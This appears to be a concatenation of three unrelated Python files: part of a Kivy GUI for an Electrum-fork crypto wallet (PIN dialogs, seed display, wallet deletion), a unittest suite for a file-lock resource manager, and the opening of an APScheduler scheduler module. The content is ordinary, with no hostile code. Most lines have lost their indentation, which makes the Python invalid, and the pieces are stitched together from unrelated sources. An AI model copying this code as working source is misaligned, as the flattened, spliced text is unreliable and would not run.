def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
        ''' Initialize the UX part of Electrum. This function performs the
        basic tasks of setting up the UI.
        '''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_zeny_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_zeny_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_zeny_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_zeny_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging (%d blocks)"%server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum-MONA', message,
app_icon=icon, app_name='Electrum-MONA')
except ImportError:
            Logger.error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
        ''' Show an error message bubble.
        '''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
        ''' Show an info message bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
        '''Method to show an information bubble.

        :param text: message to be displayed
        :param pos: position of the bubble
        :param duration: seconds the bubble remains on screen; 0 = click to hide
        :param width: width of the bubble
        :param arrow_pos: arrow position of the bubble
        '''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
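    # Illustrative call of show_info_bubble (hedged example; the text and
    # duration are made up):
    #   app.show_info_bubble(text=_('Payment received'), duration=5,
    #                        arrow_pos='bottom_mid')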
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
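    # Illustrative use (hedged; _do_action and arg are hypothetical names): gate
    # an action behind the PIN dialog. The wrapped function receives the
    # password (or None when the wallet has no password) as its last argument:
    #   self.protected(_("Enter your PIN code"), self._do_action, (arg,))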
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
from .uix.dialogs.password_dialog import PasswordDialog
def callback(pw):
Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
|
test_executor_resources.py
|
import os
from concurrent.futures import as_completed
from multiprocessing import Process
import platform
from unittest import mock
import filelock
from vsi.tools.dir_util import is_dir_empty
from terra.tests.utils import (
TestSettingsConfigureCase, TestCase, TestThreadPoolExecutorCase
)
from terra.executor.process import ProcessPoolExecutor
from terra.executor.thread import ThreadPoolExecutor
from terra.executor.resources import (
Resource, ResourceError, test_dir, logger as resource_logger,
ProcessLocalStorage, ThreadLocalStorage, ResourceManager,
atexit_resource_release
)
from terra import settings
# Cheat code: Run test 100 times, efficiently, good for looking for
# intermittent issues
# just --wrap Terra_Pipenv run env TERRA_UNITTEST=1 python -c \
# "from unittest.main import main; main(
# module=None,
# argv=['', '-f']+100*[
# 'terra.tests.test_executor_resources.TestResourceLock.test_items'
# ]
# )"
def get_lock_dir(name):
return os.path.join(settings.processing_dir, '.resource.locks',
platform.node(), str(os.getpid()), name)
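# e.g. get_lock_dir('gpu') yields
# <settings.processing_dir>/.resource.locks/<hostname>/<pid>/gpu
# ('gpu' is an arbitrary example resource name)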
class TestResourceCase(TestSettingsConfigureCase):
def setUp(self):
self.config.executor = {'type': 'SyncExecutor'}
super().setUp()
class TestResourceSimple(TestResourceCase):
def test_resource_registry(self):
# Test that the ledger of all resources is working
resource = Resource('ok', 1)
self.assertIn(resource, Resource._resources)
resource = None
self.assertNotIn(resource, Resource._resources)
def test_file_name(self):
# test Resource.lock_file_name
resource = Resource('stuff', 1)
lock_dir = get_lock_dir('stuff')
self.assertEqual(resource.lock_file_name(0, 0),
os.path.join(lock_dir, '0.0.lock'))
self.assertEqual(resource.lock_file_name(10, 999),
os.path.join(lock_dir, '10.999.lock'))
class TestResourceLock(TestResourceCase):
def test_acquire_single(self):
# test acquiring a lock in a single thread
test1 = Resource('single', 2, 1)
test2 = Resource('single', 2, 1)
test3 = Resource('single', 2, 1)
lock1 = test1.acquire()
lock2 = test1.acquire()
    # Acquiring twice should return the same cached value
self.assertEqual(lock1, lock2)
lock3 = test2.acquire()
    # However, an entirely different resource instance won't share the cache
self.assertNotEqual(lock1, lock3)
# At this point, I should be out of resources
with self.assertRaises(ResourceError):
test3.acquire()
# cleanup warnings
test1.release(force=True)
test2.release(force=True)
def test_release(self):
# test releasing a lock in a single thread
test = Resource('test', 1, 1)
test.acquire()
lock = test._local.lock
self.assertIsNotNone(test._local.lock)
self.assertIsNotNone(test._local.resource_id)
self.assertIsNotNone(test._local.instance_id)
test.release()
    # make sure the lock file and cache are cleaned up
self.assertNotExist(lock.lock_file)
self.assertIsNone(test._local.lock)
self.assertIsNone(test._local.resource_id)
self.assertIsNone(test._local.instance_id)
def test_force_release(self):
test = Resource('test', 1, 1)
test.acquire()
test.acquire()
test.release(force=True)
self.assertFalse(test.is_locked)
def test_release_on_delete(self):
# test leftover locks are detected and cleaned up
test = Resource('test', 1, 1)
test.acquire()
with self.assertLogs('terra.executor.resources', level='WARNING') as cm:
filename = test._local.lock._lock_file
self.assertExist(filename)
      del test
self.assertNotExist(filename)
self.assertIn('A test resource was not released. Cleaning up on delete.',
cm.output[0])
def test_atexit(self):
test2 = Resource('test2', 1, 1)
test3 = Resource('test3', 1, 1)
test2.acquire()
test3.acquire()
test3.acquire()
filename2 = test2._local.lock._lock_file
filename3 = test3._local.lock._lock_file
self.assertExist(filename2)
self.assertExist(filename3)
atexit_resource_release()
self.assertNotExist(filename2)
self.assertNotExist(filename3)
def test_multiple_release(self):
test = Resource('test', 1, 1)
self.assertFalse(test.is_locked)
test.acquire()
self.assertTrue(test.is_locked)
self.assertEqual(test._local.lock._lock_counter, 1)
test.acquire()
self.assertTrue(test.is_locked)
self.assertEqual(test._local.lock._lock_counter, 2)
test.release()
self.assertTrue(test.is_locked)
self.assertEqual(test._local.lock._lock_counter, 1)
test.release()
self.assertFalse(test.is_locked)
with self.assertRaisesRegex(ValueError,
"Release called with no lock acquired"):
test.release()
def test_dir_cleanup(self):
# Test that empty lock dir is auto deleted
resource = Resource('test', 1, 1)
if filelock.FileLock == filelock.SoftFileLock:
self.assertNotExist(resource.lock_dir)
else:
self.assertExist(resource.lock_dir, is_dir=True)
resource.acquire()
self.assertExist(resource.lock_dir, is_dir=True)
lock_file = resource._local.lock.lock_file
self.assertExist(lock_file)
resource.release()
self.assertNotExist(lock_file)
self.assertNotExist(resource.lock_dir)
def test_with_context(self):
# test with
resource = Resource('test', 2, 1)
self.assertFalse(resource.is_locked)
with resource as r1:
self.assertTrue(resource.is_locked)
self.assertFalse(resource.is_locked)
with resource as r2:
with resource as r3:
self.assertTrue(resource.is_locked)
self.assertEqual(resource._local.lock._lock_counter, 2)
self.assertTrue(resource.is_locked)
self.assertFalse(resource.is_locked)
self.assertEqual(r1, r2)
self.assertEqual(r2, r3)
def test_repeats(self):
# test repeated resources
repeat1 = Resource('repeat', 2, 2)
repeat2 = Resource('repeat', 2, 2)
repeat3 = Resource('repeat', 2, 2)
repeat4 = Resource('repeat', 2, 2)
repeat5 = Resource('repeat', 2, 2)
lock1 = repeat1.acquire()
lock2 = repeat2.acquire()
lock3 = repeat3.acquire()
lock4 = repeat4.acquire()
# Four unique names
self.assertEqual(len({repeat1._local.lock.lock_file,
repeat2._local.lock.lock_file,
repeat3._local.lock.lock_file,
repeat4._local.lock.lock_file}), 4)
# reacquire, cache
lock1b = repeat1.acquire()
lock2b = repeat2.acquire()
lock3b = repeat3.acquire()
lock4b = repeat4.acquire()
self.assertEqual(lock1, lock1b)
self.assertEqual(lock2, lock2b)
self.assertEqual(lock3, lock3b)
self.assertEqual(lock4, lock4b)
with self.assertRaises(ResourceError):
repeat5.acquire()
self.assertEqual(lock1, 0)
self.assertEqual(repeat1._local.instance_id, 0)
self.assertEqual(lock2, 1)
self.assertEqual(repeat2._local.instance_id, 0)
self.assertEqual(lock3, 0)
self.assertEqual(repeat3._local.instance_id, 1)
self.assertEqual(lock4, 1)
self.assertEqual(repeat4._local.instance_id, 1)
# Clean up warnings
repeat1.release(force=True)
repeat2.release(force=True)
repeat3.release(force=True)
repeat4.release(force=True)
def test_items(self):
# Test list of objects as resources
resource1 = Resource('items', ['foo', 'bar'])
resource2 = Resource('items', ['foo', 'bar'])
resource3 = Resource('items', ['foo', 'bar'])
foo = resource1.acquire()
self.assertEqual(foo, 'foo')
self.assertEqual(foo, resource1.acquire())
bar = resource2.acquire()
self.assertEqual(bar, 'bar')
self.assertEqual(bar, resource2.acquire())
with self.assertRaises(ResourceError):
resource3.acquire()
# Clean up warnings
resource1.release(force=True)
resource2.release(force=True)
def test_none(self):
    # An early version of the code used None in a way that tripped up the
    # logic; this test makes sure that doesn't happen again.
resource1 = Resource('none', [None, None, 1], 1)
resource2 = Resource('none', [None, None, 1], 1)
resource3 = Resource('none', [None, None], 1)
n1 = resource1.acquire()
self.assertIsNone(n1)
    # Prevent the accidental delete-lock loophole, which would create a race
    # condition if not caught
lock1 = resource1._local.lock
self.assertIsNone(resource1.acquire())
n2 = resource2.acquire()
self.assertIsNone(n2)
# resource2 should already be acquired, make sure it's not accidentally
# unlocking and relocking again
lock1.release()
self.assertIsNone(resource2.acquire())
lock1.acquire(timeout=0)
# two unique names
self.assertEqual(len({resource1._local.lock.lock_file,
resource2._local.lock.lock_file}), 2)
with self.assertRaises(ResourceError):
resource3.acquire()
# Clean up warnings
resource1.release(force=True)
resource2.release(force=True)
class TestResourceSoftLock(TestResourceLock):
# test soft lock specific behaviors
def setUp(self):
self.patches.append(mock.patch.object(filelock, 'FileLock',
filelock.SoftFileLock))
super().setUp()
def test_dirty_dir(self):
# test leftover locks are detected and cleaned up
lock_dir = get_lock_dir('dirty')
os.makedirs(lock_dir, exist_ok=True)
with self.assertLogs('terra.executor.resources', level='WARNING') as cm:
resource_logger.warning('None')
Resource('dirty', 1, 1)
self.assertEqual(len(cm.output), 1)
with open(os.path.join(lock_dir, 'foo'), 'w') as fid:
fid.write('ok')
with self.assertLogs('terra.executor.resources', level='WARNING') as cm:
resource2 = Resource('dirty', 1, 1)
self.assertIn('is not empty. Deleting it now', cm.output[0])
self.assertFalse(os.path.exists(resource2.lock_dir))
class TestResourceSoftLockSelection(TestResourceCase):
# Just testing the switch to softlock mechanism works
@mock.patch.object(filelock, 'FileLock', filelock.SoftFileLock)
def test_no_os_hard(self):
# test when the os doesn't support hard locks
lock_dir = get_lock_dir('no_os_hard')
self.assertNotExist(lock_dir)
resource1 = Resource('no_os_hard', 1, use_softfilelock=None)
resource2 = Resource('no_os_hard', 1, use_softfilelock=False)
resource3 = Resource('no_os_hard', 1, use_softfilelock=True)
self.assertNotExist(lock_dir)
self.assertEqual(resource1.FileLock, filelock.SoftFileLock)
self.assertEqual(resource2.FileLock, filelock.SoftFileLock)
self.assertEqual(resource3.FileLock, filelock.SoftFileLock)
@mock.patch.object(filelock.UnixFileLock, '_acquire',
lambda self: exec("raise OSError('Fake fail')"))
@mock.patch.object(filelock.WindowsFileLock, '_acquire',
lambda self: exec("raise OSError('Fake fail')"))
def test_no_dir_hard_support(self):
    # Test lock-dir creation when the directory does not support hard locks
self.assertFalse(test_dir(self.temp_dir.name))
lock_dir1 = get_lock_dir('no_dir_hard1')
lock_dir2 = get_lock_dir('no_dir_hard2')
lock_dir3 = get_lock_dir('no_dir_hard3')
self.assertNotExist(lock_dir1)
self.assertNotExist(lock_dir2)
self.assertNotExist(lock_dir3)
    # The dir probe should show that using hard locks would fail here
resource1 = Resource('no_dir_hard1', 1, use_softfilelock=None)
resource2 = Resource('no_dir_hard2', 1, # noqa: F841
use_softfilelock=True)
resource3 = Resource('no_dir_hard3', 1, # noqa: F841
use_softfilelock=False)
self.assertExist(lock_dir1, is_dir=True)
self.assertNotExist(lock_dir2)
self.assertNotExist(lock_dir3)
self.assertEqual(resource1.FileLock, filelock.SoftFileLock)
@mock.patch.object(filelock, 'FileLock',
filelock.WindowsFileLock if os.name == 'nt'
else filelock.UnixFileLock)
def test_softlock_test(self):
    # Test lock-dir creation when the OS does support hard locks
lock_dir1 = get_lock_dir('soft1')
lock_dir2 = get_lock_dir('soft2')
lock_dir3 = get_lock_dir('soft3')
self.assertNotExist(lock_dir1)
self.assertNotExist(lock_dir2)
self.assertNotExist(lock_dir3)
resource1 = Resource('soft1', 1, use_softfilelock=None) # noqa: F841
resource2 = Resource('soft2', 1, use_softfilelock=True) # noqa: F841
resource3 = Resource('soft3', 1, use_softfilelock=False) # noqa: F841
self.assertExist(lock_dir1, is_dir=True)
self.assertNotExist(lock_dir2)
self.assertNotExist(lock_dir3)
self.assertTrue(is_dir_empty(lock_dir1))
# tearDown will auto clear this:
# 1) preventing inter-test name collisions
# 2) stopping strong refs of resources from being kept around
data = {}
# Cannot be a member of the test case class, because TestCase is not
# serializable: somewhere in TestCase's _outcome a "cannot serialize
# '_io.TextIOWrapper' object" error occurs
def acquire(name, i):
  # This function is meant to be called once per worker, and has some hacks to
  # guarantee that the simulation behaves that way. If you are adding another
  # test, you probably don't want to use this function; copy it and write a
  # similar one.
l1 = data[name].acquire()
l2 = data[name].acquire()
  # There is a chance the same thread/process will be reused because of how
  # concurrent.futures optimizes, but i is unique and is used to keep the
  # local-storage locks from being deleted, for the purposes of this test.
  # This is meant to simulate "three _different_ threads/processes".
data[name + str(i)] = data[name]._local.lock
# Reset "worker local storage"
data[name]._local.lock = None
data[name]._local.resource_id = None
data[name]._local.instance_id = None
return (l1, l2)
def simple_acquire(name):
rv = data[name].acquire()
# import time
# time.sleep(0.1)
return rv
class TestResourceMulti:
'''
Test that Resource works
'''
def setUp(self):
self.config.executor = {'type': self.name}
super().setUp()
def tearDown(self):
data.clear()
super().tearDown()
def test_acquire(self):
# test acquiring in parallel
data[self.name] = Resource(self.name, 2, 1)
futures = []
results = []
exceptions = 0
with self.Executor(max_workers=3) as executor:
for i in range(3):
futures.append(executor.submit(acquire, self.name, i))
for future in as_completed(futures):
try:
results.append(future.result())
except ResourceError:
exceptions += 1
self.assertEqual(exceptions, 1)
self.assertNotEqual(results[0], results[1])
self.assertEqual(results[0][0], results[0][1])
self.assertEqual(results[1][0], results[1][1])
def test_multiple_executor(self):
    # Unlike test_acquire, this is not trying to test the exception, so there
    # is no need to force locks to stay locked; in fact, that would break this
    # test. Tests that locks are indeed cleaned up automatically, so that
    # consecutive executors will not interfere with each other.
data[self.name] = Resource(self.name, 1, 1)
for _ in range(2):
futures = []
with self.Executor(max_workers=1) as executor:
futures.append(executor.submit(simple_acquire, self.name))
for future in as_completed(futures):
future.result()
# double check resource was freed
data[self.name].acquire()
data[self.name].release()
def test_local_storage_type(self):
# test the types are right
resource = Resource('storage', 2, 1)
if self.Executor.multiprocess:
self.assertIsInstance(resource._local, ProcessLocalStorage)
else:
self.assertIsInstance(resource._local, ThreadLocalStorage)
class TestResourceThread(TestResourceMulti,
TestSettingsConfigureCase,
TestThreadPoolExecutorCase):
# Test for multithreaded case
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.Executor = ThreadPoolExecutor
self.name = "ThreadPoolExecutor"
class TestResourceProcess(TestResourceMulti,
TestSettingsConfigureCase):
# Test for multiprocess case
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.Executor = ProcessPoolExecutor
self.name = "ProcessPoolExecutor"
@mock.patch.object(filelock, 'FileLock', filelock.SoftFileLock)
def test_full(self):
# Test resource recovery after a premature termination
lock_dir = get_lock_dir('full')
resource = Resource('full', ['foo'], 1)
os.makedirs(lock_dir, exist_ok=True)
with open(os.path.join(lock_dir, '0.0.lock'), 'w') as fid:
fid.write(str(os.getpid()))
with self.assertRaises(ResourceError):
resource.acquire()
process = Process(target=lambda: 0)
process.start()
dead_pid = process.pid
process.join()
with open(os.path.join(lock_dir, '0.0.lock'), 'w') as fid:
fid.write(str(dead_pid))
lock = resource.acquire()
self.assertEqual(lock, 'foo')
# Test that additional calls to acquire after recovering resource, work
self.assertEqual(lock, resource.acquire())
# Clean up warnings
resource.release(force=True)
class TestResourceManager(TestResourceCase):
def setUp(self):
self.patches.append(mock.patch.dict(ResourceManager.resources))
super().setUp()
def test_register(self):
# test registration and recall work
ResourceManager.register_resource('registered', 3, 2)
ResourceManager.register_resource('pets', ['cat', 'dog', 'bird'], 1)
resource = ResourceManager.get_resource('registered')
self.assertEqual(resource.name, 'registered')
self.assertEqual(resource.repeat, 2)
self.assertEqual(resource.resources, range(3))
resource = ResourceManager.get_resource('pets')
self.assertEqual(resource.name, 'pets')
self.assertEqual(resource.repeat, 1)
self.assertEqual(resource.resources, ['cat', 'dog', 'bird'])
def test_unregistered(self):
# Test getting unregistered fails
with self.assertRaises(KeyError):
ResourceManager.get_resource('unregistered')
class TestStrayResources(TestCase):
def last_test_stray_resources(self):
# Makes sure no tests leave any resources registered, possibly interfering
# with other tests.
self.assertDictEqual(ResourceManager.resources, {})
    # Make sure there aren't any resources left over after all the tests have
    # run. Passing this means that every test that has run used the correct
    # mock patches and hasn't kept any references around in global persistence.
self.assertSetEqual(Resource._resources, set())
|
scheduler.py
|
"""
This module is the main part of the library. It houses the Scheduler class
and related exceptions.
"""
from threading import Thread, Event, Lock
from datetime import datetime, timedelta
from logging import getLogger
import os
import sys
from apscheduler.util import *
from apscheduler.triggers import SimpleTrigger, IntervalTrigger, CronTrigger
from apscheduler.jobstores.ram_store import RAMJobStore
from apscheduler.job import Job, MaxInstancesReachedError
from apscheduler.events import *
from apscheduler.threadpool import ThreadPool
logger = getLogger(__name__)
class SchedulerAlreadyRunningError(Exception):
"""
Raised when attempting to start or configure the scheduler when it's
already running.
"""
def __str__(self):
return 'Scheduler is already running'
class Scheduler(object):
"""
This class is responsible for scheduling jobs and triggering
their execution.
"""
_stopped = True
_thread = None
def __init__(self, gconfig={}, **options):
self._wakeup = Event()
self._jobstores = {}
self._jobstores_lock = Lock()
self._listeners = []
self._listeners_lock = Lock()
self._pending_jobs = []
self.configure(gconfig, **options)
def configure(self, gconfig={}, **options):
"""
Reconfigures the scheduler with the given options. Can only be done
when the scheduler isn't running.
"""
if self.running:
raise SchedulerAlreadyRunningError
# Set general options
config = combine_opts(gconfig, 'apscheduler.', options)
self.misfire_grace_time = int(config.pop('misfire_grace_time', 1))
self.coalesce = asbool(config.pop('coalesce', True))
self.daemonic = asbool(config.pop('daemonic', True))
self.standalone = asbool(config.pop('standalone', False))
# Configure the thread pool
if 'threadpool' in config:
self._threadpool = maybe_ref(config['threadpool'])
else:
threadpool_opts = combine_opts(config, 'threadpool.')
self._threadpool = ThreadPool(**threadpool_opts)
# Configure job stores
jobstore_opts = combine_opts(config, 'jobstore.')
jobstores = {}
for key, value in jobstore_opts.items():
store_name, option = key.split('.', 1)
opts_dict = jobstores.setdefault(store_name, {})
opts_dict[option] = value
for alias, opts in jobstores.items():
classname = opts.pop('class')
cls = maybe_ref(classname)
jobstore = cls(**opts)
self.add_jobstore(jobstore, alias, True)
def start(self):
"""
Starts the scheduler in a new thread.
In threaded mode (the default), this method will return immediately
after starting the scheduler thread.
In standalone mode, this method will block until there are no more
scheduled jobs.
"""
if self.running:
raise SchedulerAlreadyRunningError
# Create a RAMJobStore as the default if there is no default job store
        if 'default' not in self._jobstores:
self.add_jobstore(RAMJobStore(), 'default', True)
# Schedule all pending jobs
for job, jobstore in self._pending_jobs:
self._real_add_job(job, jobstore, False)
del self._pending_jobs[:]
self._stopped = False
if self.standalone:
self._main_loop()
else:
self._thread = Thread(target=self._main_loop, name='APScheduler')
            self._thread.daemon = self.daemonic
self._thread.start()
def shutdown(self, wait=True, shutdown_threadpool=True,
close_jobstores=True):
"""
Shuts down the scheduler and terminates the thread.
Does not interrupt any currently running jobs.
:param wait: ``True`` to wait until all currently executing jobs have
finished (if ``shutdown_threadpool`` is also ``True``)
:param shutdown_threadpool: ``True`` to shut down the thread pool
:param close_jobstores: ``True`` to close all job stores after shutdown
"""
if not self.running:
return
self._stopped = True
self._wakeup.set()
# Shut down the thread pool
if shutdown_threadpool:
self._threadpool.shutdown(wait)
# Wait until the scheduler thread terminates
if self._thread:
self._thread.join()
# Close all job stores
if close_jobstores:
for jobstore in itervalues(self._jobstores):
jobstore.close()
@property
def running(self):
        thread_alive = self._thread and self._thread.is_alive()
standalone = getattr(self, 'standalone', False)
return not self._stopped and (standalone or thread_alive)
def add_jobstore(self, jobstore, alias, quiet=False):
"""
Adds a job store to this scheduler.
:param jobstore: job store to be added
:param alias: alias for the job store
:param quiet: True to suppress scheduler thread wakeup
:type jobstore: instance of
:class:`~apscheduler.jobstores.base.JobStore`
:type alias: str
"""
self._jobstores_lock.acquire()
try:
if alias in self._jobstores:
raise KeyError('Alias "%s" is already in use' % alias)
self._jobstores[alias] = jobstore
jobstore.load_jobs()
finally:
self._jobstores_lock.release()
# Notify listeners that a new job store has been added
self._notify_listeners(JobStoreEvent(EVENT_JOBSTORE_ADDED, alias))
# Notify the scheduler so it can scan the new job store for jobs
if not quiet:
self._wakeup.set()
def remove_jobstore(self, alias, close=True):
"""
Removes the job store by the given alias from this scheduler.
